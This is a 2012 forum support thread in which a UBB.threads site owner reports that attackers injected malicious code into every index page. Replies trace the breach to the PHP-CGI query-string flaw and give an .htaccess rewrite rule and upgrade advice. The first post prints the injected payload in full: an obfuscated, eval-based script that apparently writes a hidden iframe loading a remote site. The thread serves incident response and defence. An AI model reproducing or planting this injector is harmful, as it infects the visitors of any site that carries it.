Previous Thread
Next Thread
Print Thread
Hop To
hackers breached my site through UBB
#249131 05/11/2012 10:19 AM
Joined: May 2008
Posts: 735
old hand
OP Offline
old hand
Joined: May 2008
Posts: 735
hackers found a way to inject a file onto my site that self replicated throughout my server and injected malicious code in all index.htm and index.html files.

they did it with this...
Code
-- SD: saved code locally and removed from post --

and this is what they were injecting...
Code
 
<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c63c77c59c55c79c76c75c55c76c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c63c77c59c55c79c76c75c55c76c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);} if(v&&e&&r)e(s);</script>

I am using UBB 7.5.6p2


Last edited by SD; 05/11/2012 11:44 AM. Reason: Just removed actual exploit line

"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"
Re: hackers breached my site through UBB
Bad Frog #249132 05/11/2012 11:40 AM
Joined: Jun 2006
Posts: 81
member
Offline
member
Joined: Jun 2006
Posts: 81
If the above code works, it is WAY NOT COOL and irresponsible to post it in public.

Please delete it and send it to UBBSystem as a PM or e-mail or both.


Re: hackers breached my site through UBB
Bad Frog #249133 05/11/2012 11:42 AM
Joined: Apr 2007
Posts: 3,940
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,940
it's a php flaw and not a ubb flaw. ( from what i've gathered )

if your host is running php as a CGI, then there is a known exploit to any php that can be temporarily fixed with .htaccess change..

http://www.php.net/archive/2012.php#id2012-05-03-1

Quote
To fix this, update to PHP 5.3.12 or PHP 5.4.2.

We recognize that since CGI is a rather outdated way to run PHP, it may not be feasible to upgrade these sites to a modern version of PHP.

An alternative is to configure your web server to not let these types of requests with query strings starting with a "-" and not containing a "=" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this:

( mod_rewrite must be enabled - usually is - add to .htaccess )

Code
RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
RewriteRule ^(.*) $1? [L]

can you run phpinfo ( from your cpanel and verify ? )

ty smile

Re: hackers breached my site through UBB
Bad Frog #249134 05/11/2012 11:46 AM
Joined: Apr 2007
Posts: 3,940
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,940
note: if your PHP is running as a FAST CGI or DSO, then this can't be exploited.

so push your host to run 1 of the 2 AND have php upgraded to latest version.

this has been around in php/cgi for 8yrs...

you should really push your host to:

Quote
Cid advised Web servers administrators who run PHP through php-cgi, to update to the new PHP 5.4.3 or PHP 5.3.13, or to modify their setup so that it uses the PHP module (mod_php) under Apache or FastCGI, which is not vulnerable.

if possible, however..

2c

Re: hackers breached my site through UBB
Bad Frog #249145 05/11/2012 12:50 PM
Joined: Dec 2003
Posts: 1,796
Pooh-Bah
Offline
Pooh-Bah
Joined: Dec 2003
Posts: 1,796
zoinks, or change hosts if they refuse to update 8 year old software - there's a responsibility to customers regarding this when they decide to accept money for hosting.


- Allen
- ThreadsDev | PraiseCafe
Re: hackers breached my site through UBB
Bad Frog #249146 05/11/2012 12:52 PM
Joined: Apr 2007
Posts: 3,940
SD Offline
Former Developer
Offline
Former Developer
Joined: Apr 2007
Posts: 3,940
well, it's an 8yr old bug.. the software ( php ) is recent builds, but the host has decided to run it as a CGI ( ancient )..

note: ubbcentral runs as fastcgi ( safe ) here.

so you are correct, allen that the host should get away from CGI and/or upgrade to one of those 2 versions of php

smile

Re: hackers breached my site through UBB
Bad Frog #249155 05/11/2012 4:07 PM
Joined: May 2008
Posts: 735
old hand
OP Offline
old hand
Joined: May 2008
Posts: 735
I pointed my host to this thread and they took care of things.
Thank you for the help!


"No matter where you go, there you are."
"If you can't do something smart, Do something right"
"There are three kinds of people in the world, those who can count, and those who can't"

Link Copied to Clipboard
ShoutChat Box
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
[NOTABUG] Report Post bug..
by Morgan - 07/05/2020 1:48 PM
Trial Subscription question.
by Ruben - 07/03/2020 2:34 PM
Unread posts no longer tracked per user...
by KirkW - 06/16/2020 12:21 AM
Max Image file size upload
by jjjjj - 06/10/2020 10:25 PM
Error on Inert into POSTS
by jjjjj - 06/07/2020 8:09 PM
Who's Online Now
2 members (Gizmo, JAISP), 108 guests, and 44 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Amusing Terain Scenics
Amusing Terain Scenics
by isaac, August 19
Sky places
Sky places
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 7.7.4